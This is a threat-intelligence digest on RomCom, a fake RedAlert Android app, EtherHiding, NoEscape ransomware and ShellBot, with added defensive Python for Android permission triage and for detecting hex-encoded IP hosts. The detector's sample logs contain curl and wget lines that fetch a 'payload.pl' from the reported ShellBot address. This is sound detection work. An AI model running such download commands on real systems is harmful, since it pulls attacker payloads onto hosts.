
The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Backdoors, Blockchain, Botnets, Hexadecimal IP notation, Infostealers, and Ransomware. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Void Rabisu Targets Female Political Leaders with New Slimmed-Down ROMCOM Variant
(published: October 13, 2023)
The threat group Tropical Scorpius (Void Rabisu, Storm-0978, and UNC2596) became known for its financially motivated attacks, such as those involving the Cuba ransomware. However, it gradually shifted its focus to cyberespionage attacks. Trend Micro researchers describe the group’s emphasis on their custom RomCom RAT/backdoor, which is continuously evolving. The latest version, ROMCOM 4.0 (PEAPOD), has been streamlined to its core functions, with additional components (COM hijacking loader, worker, and network modules) being downloaded as needed. The most recent set of attacks, detected in August 2023, delivered ROMCOM 4.0 via a website that mimics a legitimate site of the Women Political Leaders Summit in Brussels, Belgium. The target is prompted to open a malicious EXE file that downloads an XOR-encrypted DLL, which, in turn, downloads the other components. This continues the trend of Tropical Scorpius targeting conferences, primarily focusing on defense and government targets in Ukraine and countries supporting Ukraine.
Analyst Comment: Tropical Scorpius has targeted participants of at least three conferences in 2023, increasing the threat to other conferences and special interest groups. Anomali customers concerned about risks to their digital assets (including similar/typosquatted domains) can try out Anomali’s Premium Digital Risk Protection service. All known indicators associated with this campaign are available in the Anomali platform, and customers are advised to block these on their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] Command and Control – Remote File Copy [T1105] | [MITRE ATT&CK] Defense Evasion – Obfuscated Files or Information [T1027] | [MITRE ATT&CK] Defense Evasion – Deobfuscate/Decode Files or Information [T1140] | [MITRE ATT&CK] Persistence – Event Triggered Execution: Component Object Model Hijacking [T1546.015] | [MITRE ATT&CK] Discovery – System Information Discovery [T1082] | [MITRE ATT&CK] Collection – Data from Local System [T1005] | [MITRE ATT&CK] Defense Evasion – Indicator Removal: File Deletion [T1070.004] | [MITRE ATT&CK] Defense Evasion – Indicator Removal: Clear Persistence [T1070.009]
Tags: actor:Void Rabisu, actor:Storm-0978, actor:Tropical Scorpius, actor:UNC2596, malware:ROMCOM, malware:ROMCOM 4.0, malware:PEAPOD, malware-type:Backdoor, target-industry:Politics, target-industry:Military, target-industry:Defense, target-industry:Government, target-region:Europe, threat-type:Cyberespionage, vulnerability:CVE-2023-36884, technique:COM hijacking, technique:Memory-only execution, technique:Named pipe, technique:TLS-enforcing, technique:Typosquatting, abused:OneDrive, abused:Elbor LLC, source-country:RU, file-type:DLL, file-type:EXE, file-type:ICO, target-system:Windows
Malicious “RedAlert – Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information
(published: October 13, 2023)
On October 13, 2023, Cloudflare researchers discovered a typosquatted website hosting an Android infostealer impersonating the legitimate “RedAlert – Rocket Alerts” (RedAlert by Elad Nava) application. It targets Israeli users with a malicious app that looks like the legitimate app it impersonates. Its onCreate() method was modified with a startService() call that starts a malicious package called “com.company.allinclusive.AI.” The malicious app relies on additional permissions to collect an extensive list of sensitive user data, including contacts, call logs, SMS, account information, and an overview of all installed apps. The stolen data is encrypted with AES in CBC mode with PKCS5 padding. The keys and the data in transit are additionally protected with RSA encryption using a public key bundled in the malicious app.
Analyst Comment: The identified typosquatting domain that was staging the malicious version of the RedAlert by Elad Nava app has been taken offline, but users who installed it are urgently advised to delete the app. Users can identify compromise if the following permissions appear on the RedAlert app (whether or not enabled): Call Logs, Contacts, Phone, and SMS. It is crucial to install legitimate versions directly from the official mobile stores, such as the Play Store for Android phones. Keep your mobile device up to date on the latest software version, and avoid installing applications from Internet URLs or sideloading packages. All known indicators associated with this campaign are available in the Anomali platform, and customers are advised to block these on their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] T1633 – Virtualization/Sandbox Evasion | [MITRE ATT&CK] T1633.001 – Virtualization/Sandbox Evasion: System Checks | [MITRE ATT&CK] T1424 – Process Discovery | [MITRE ATT&CK] T1426 – System Information Discovery | [MITRE ATT&CK] T1533 – Data From Local System | [MITRE ATT&CK] T1521.002 – Encrypted Channel: Asymmetric Cryptography | [MITRE ATT&CK] T1437.001 – Application Layer Protocol: Web Protocols | [MITRE ATT&CK] T1646 – Exfiltration Over C2 Channel
Tags: target-country:IL, threat-type:Fake mobile app, technique:Typosquatting, technique:Requesting additional permissions, impersonated:RedAlert by Elad Nava, impersonated:RedAlert – Rocket Alerts, target-system:Android
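As an added example that is not part of the Cloudflare report or of Anomali's advice, the following Python applies the permission check from the analyst comment to the output of `adb shell dumpsys package <package>`: it extracts the app's requested permissions and reports which of the four groups (Call Logs, Contacts, Phone, SMS) they fall under. The package name and the dumpsys excerpts are constructed placeholders in the layout of real dumpsys output; the permission-to-group mapping uses standard Android permission names.

```python
# Added example: map Android permission names to the four permission groups
# that the analyst comment says should not appear on a genuine RedAlert install.
SUSPECT_GROUPS = {
    "Call Logs": {"android.permission.READ_CALL_LOG", "android.permission.WRITE_CALL_LOG"},
    "Contacts": {"android.permission.READ_CONTACTS", "android.permission.WRITE_CONTACTS"},
    "Phone": {"android.permission.READ_PHONE_STATE", "android.permission.CALL_PHONE",
              "android.permission.READ_PHONE_NUMBERS"},
    "SMS": {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
            "android.permission.SEND_SMS"},
}

# Constructed sample in the layout of `adb shell dumpsys package <pkg>`; the package
# name is a placeholder, not the real RedAlert package.
SAMPLE_DUMPSYS = """\
Packages:
  Package [com.example.placeholder.redalert] (1a2b3c4):
    userId=10123
    requested permissions:
      android.permission.INTERNET
      android.permission.ACCESS_NETWORK_STATE
      android.permission.READ_CONTACTS
      android.permission.READ_CALL_LOG
      android.permission.READ_SMS
      android.permission.READ_PHONE_STATE
      android.permission.GET_ACCOUNTS
    install permissions:
      android.permission.INTERNET: granted=true
      android.permission.ACCESS_NETWORK_STATE: granted=true
"""

# Constructed sample of what a benign alerting app would request.
CLEAN_DUMPSYS = """\
Packages:
  Package [com.example.placeholder.redalert] (1a2b3c4):
    requested permissions:
      android.permission.INTERNET
      android.permission.POST_NOTIFICATIONS
    install permissions:
      android.permission.INTERNET: granted=true
"""


def requested_permissions(dumpsys_text):
    """Collect every permission listed under 'requested permissions:'.

    The section ends at the next indented header (a line ending with ':').
    """
    perms, in_section = set(), False
    for raw in dumpsys_text.splitlines():
        line = raw.strip()
        if line == "requested permissions:":
            in_section = True
            continue
        if not in_section or not line:
            continue
        if line.endswith(":"):
            in_section = False
            continue
        # Permission lines are bare names; tolerate a trailing ': granted=...' suffix.
        perms.add(line.split(":", 1)[0].split()[0])
    return perms


def suspicious_groups(perms):
    """Return the analyst-comment groups matched by the requested permissions, sorted."""
    return sorted(group for group, names in SUSPECT_GROUPS.items() if perms & names)


def triage(dumpsys_text):
    """Full check: dumpsys text in, list of suspicious permission groups out."""
    return suspicious_groups(requested_permissions(dumpsys_text))


if __name__ == "__main__":
    print("suspect install:", triage(SAMPLE_DUMPSYS))  # ['Call Logs', 'Contacts', 'Phone', 'SMS']
    print("clean install:", triage(CLEAN_DUMPSYS))     # []
```

Feed the script the saved output of `adb shell dumpsys package <package>` for the installed app; any non-empty result is the signal the analyst comment describes, regardless of whether the user granted the permission, because the check is on what the app requests.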
“EtherHiding” — Hiding Web2 Malicious Code in Web3 Smart Contracts
(published: October 13, 2023)
A new technique of serving malicious code, dubbed EtherHiding, uses Binance Smart Chain (BSC) smart contracts to host malicious code. This technique has been used since at least September 9, 2023, as part of the ClearFake campaign. Attackers insert first-stage malicious code into the primary template of a WordPress site by exploiting vulnerable plugins, outdated WordPress versions, or by acquiring stolen site credentials. The second-stage payload is retrieved from a hardcoded smart contract on the BSC blockchain. The attackers frequently modify this payload, changing the third-stage payload domain almost daily. The third-stage payload defaces the WordPress site with a deceptive overlay page localized and customized for almost all popular browsers. A visitor who downloads the fake browser update is infected with one of the commodity infostealers (Amadey, Lumma, or RedLine).
Analyst Comment: Blockchain hosting makes this campaign difficult to detect and take down. Website administrators should focus on WordPress security, such as using strong, unique admin passwords, keeping plugins up to date, and removing unused add-ons and accounts. Indicators for this ClearFake campaign and associated commodity infostealers are available in the Anomali platform, and customers are advised to block these on their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] Privilege Escalation – Valid Accounts [T1078] | [MITRE ATT&CK] Initial Access – Exploit Public-Facing Application [T1190] | [MITRE ATT&CK] Command and Control – Remote File Copy [T1105] | [MITRE ATT&CK] Defense Evasion – Obfuscated Files or Information [T1027] | [MITRE ATT&CK] Defense Evasion – Deobfuscate/Decode Files or Information [T1140] | [MITRE ATT&CK] Credential Access – Credentials from Password Stores [T1555]
Tags: technique:EtherHiding, technique:Blockchain, technique:Fake browser update, campaign:ClearFake, abused:Binance, abused:Cloudflare Worker, abused:Binance Smart Chain, abused:Smart contract, abused:Web3, malware-type:Infostealer, malware:Amadey, malware:Lumma, malware:RedLine, target-software:WordPress, target-system:Windows
NoEscape Ransomware
(published: October 12, 2023)
The NoEscape ransomware-as-a-service (RaaS) affiliate program was first announced on hacker forums on May 22, 2023, but NoEscape samples in the wild go back to at least March 2023. The US Health Sector Cybersecurity Coordination Center reports significant similarities to the now-defunct Russian-speaking Avaddon RaaS program, both in tactics and in malware implementation. The NoEscape encryptor is implemented in C++ and runs on Windows NT 10.0 operating systems. It can perform asynchronous LAN scanning, and uses RSA and ChaCha20 encryption to encrypt discovered network file shares and local drives. Beyond typical double-extortion threats, the NoEscape program also offers distributed denial-of-service (DDoS), call, and spam services. NoEscape primarily targeted the US, followed by Italy, the UK, Canada, and France, while exempting former Soviet Union countries. The most affected industry was professional services, followed by manufacturing, information, education, construction, retail, government, and healthcare.
Analyst Comment: It is important to have a comprehensive and tested backup solution in place for the unfortunate case of ransomware infection. Ensure that your systems always run the most current software versions. Always practice defense-in-depth and do not rely on a single security mechanism; security measures should be layered, redundant, and fail-safe.
MITRE ATT&CK: [MITRE ATT&CK] Initial Access – External Remote Services [T1133] | [MITRE ATT&CK] Privilege Escalation – Valid Accounts [T1078] | [MITRE ATT&CK] Execution – User Execution [T1204] | [MITRE ATT&CK] Execution – Scheduled Task/Job: Scheduled Task [T1053.005] | [MITRE ATT&CK] Persistence – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] | [MITRE ATT&CK] Defense Evasion – Impair Defenses: Disable or Modify Tools [T1562.001] | [MITRE ATT&CK] Defense Evasion – Obfuscated Files or Information: Software Packing [T1027.002] | [MITRE ATT&CK] Defense Evasion – Process Injection [T1055] | [MITRE ATT&CK] Defense Evasion – Indicator Removal: File Deletion [T1070.004] | [MITRE ATT&CK] Defense Evasion – Modify Registry [T1112] | [MITRE ATT&CK] Defense Evasion – Deobfuscate/Decode Files or Information [T1140] | [MITRE ATT&CK] Defense Evasion – Virtualization/Sandbox Evasion: System Checks [T1497.001] | [MITRE ATT&CK] Credential Access – OS Credential Dumping [T1003] | [MITRE ATT&CK] Discovery – Domain Trust Discovery [T1482] | [MITRE ATT&CK] Discovery – Permission Groups Discovery [T1069] | [MITRE ATT&CK] Lateral Movement – Remote Services [T1021] | [MITRE ATT&CK] Lateral Movement – Remote Services: Remote Desktop Protocol [T1021.001] | [MITRE ATT&CK] Collection – Archive Collected Data: Archive via Utility [T1560.001] | [MITRE ATT&CK] Command and Control – Application Layer Protocol: Web Protocols [T1071.001] | [MITRE ATT&CK] Exfiltration – Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002]
Tags: malware:NoEscape, malware-type:Ransomware, detection:Trojan:Win32/Noescape, malware:Avaddon, detection:Ransom.Avaddon, actor:NoEscape, actor-type:RaaS, target-country:US, target-country:IT, target-country:UK, target-country:CA, target-country:FR, target-industry:Professional Services, target-industry:Manufacturing, target-industry:Information, target-industry:Education, target-industry:Construction, target-industry:Retail, target-industry:Government, target-industry:Healthcare, encryption:Salsa20, technique:DDoS, technique:Double extortion, language:C++, target-system:Windows, target-system:Windows NT 10.0
ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses
(published: October 12, 2023)
Since at least 2012, ShellBot (PerlBot) has been a DDoS bot of choice, installed after an initial compromise of poorly managed Linux SSH servers. ShellBot is developed in Perl and uses the IRC protocol for C2 communication. In September 2023, AhnLab researchers found that the currently circulating ShellBot variant known as DDoS PBot v2.0 adopted a new URL detection evasion technique: the threat actor changed the download URL from a regular dotted IP address to a hexadecimal value. For example, the address represented in hexadecimal as “0x2763da4e” corresponds to “39.99.218[.]78”. This technique was previously seen in an unrelated phishing PDF campaign, which abused browsers' acceptance of hexadecimal IP notation. In ShellBot's case the download is performed with curl, which accepts hexadecimal IP notation just as web browsers do.
Analyst Comment: Administrators can protect against ShellBot attacks by using strong passwords and rotating them regularly. Indicators associated with this campaign are available in the Anomali platform, and customers are advised to block these on their infrastructure.
MITRE ATT&CK: [MITRE ATT&CK] Impact – Network Denial of Service [T1498] | [MITRE ATT&CK] Defense Evasion – Obfuscated Files or Information [T1027] | [MITRE ATT&CK] Initial Access – Valid Accounts: Default Accounts [T1078.001] | [MITRE ATT&CK] Privilege Escalation – Valid Accounts [T1078] | [MITRE ATT&CK] Command and Control – Remote File Copy [T1105]
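The detection gap described above is that an IOC list holding “39.99.218[.]78” never matches a URL written as “http://0x2763da4e/”. As an added example (not from the AhnLab report or from Anomali), the following Python normalizes IPv4 hosts written in the hexadecimal, octal, or single-integer forms that curl and browsers accept (the inet_aton rules, which also allow two- and three-part forms) back to dotted decimal, and flags log lines whose download URLs use such a host. The log lines and the payload path are constructed; the 0x2763da4e / 39.99.218.78 pair is the one quoted in the report.

```python
import re
from urllib.parse import urlsplit

# Constructed sample log lines (not from the AhnLab report). The path /payload.pl is a
# placeholder; 0x2763da4e is the hexadecimal host quoted in the report.
SAMPLE_LOG_LINES = [
    "sshd[2201]: Accepted password for admin from 203.0.113.9 port 51234 ssh2",
    "bash: curl -s http://0x2763da4e/payload.pl -o /tmp/.x",   # hex host
    "bash: wget http://660855374/payload.pl",                   # same address, single decimal
    "bash: curl http://39.99.218.78/payload.pl",                # plain dotted decimal
    "bash: curl https://example.com/update.tgz",               # ordinary hostname
]

DOTTED_DECIMAL = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")


def _parse_part(part):
    """Parse one dot-separated component with inet_aton rules: 0x.. hex, leading 0 octal, else decimal."""
    if not part.isalnum():
        return None
    try:
        if part[:2].lower() == "0x":
            return int(part[2:], 16) if len(part) > 2 else None
        if len(part) > 1 and part[0] == "0":
            return int(part, 8)
        return int(part, 10)
    except ValueError:
        return None


def normalize_ipv4_host(host):
    """Return the dotted-decimal form of an inet_aton-style host (1 to 4 parts), or None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    # Leading components are single octets; the last one fills all remaining bytes.
    head, last = values[:-1], values[-1]
    if any(v > 255 for v in head):
        return None
    remaining = 4 - len(head)
    if last >= 1 << (8 * remaining):
        return None
    octets = head + [(last >> (8 * i)) & 0xFF for i in reversed(range(remaining))]
    return ".".join(str(o) for o in octets)


def is_obfuscated_ip_host(host):
    """True when the host is an IPv4 literal written in anything but plain dotted decimal."""
    if DOTTED_DECIMAL.match(host):
        return False
    return normalize_ipv4_host(host) is not None


def find_obfuscated_urls(lines):
    """Return (line, host, dotted_decimal) for each URL whose host is a non-dotted IPv4 literal."""
    hits = []
    for line in lines:
        for url in re.findall(r"https?://[^\s'\"<>]+", line):
            host = urlsplit(url).hostname or ""
            if is_obfuscated_ip_host(host):
                hits.append((line, host, normalize_ipv4_host(host)))
    return hits


if __name__ == "__main__":
    for line, host, dotted in find_obfuscated_urls(SAMPLE_LOG_LINES):
        print(f"{host} -> {dotted}: {line}")
```

Run the same normalization on the host field before matching against IP indicators in a proxy, egress filter, or SIEM rule; otherwise a list that holds only dotted-decimal addresses misses the hexadecimal, octal, and integer spellings of the very same address. Any URL whose host normalizes to an IPv4 literal but is not written in dotted decimal is worth an alert on its own, since legitimate software rarely uses those forms.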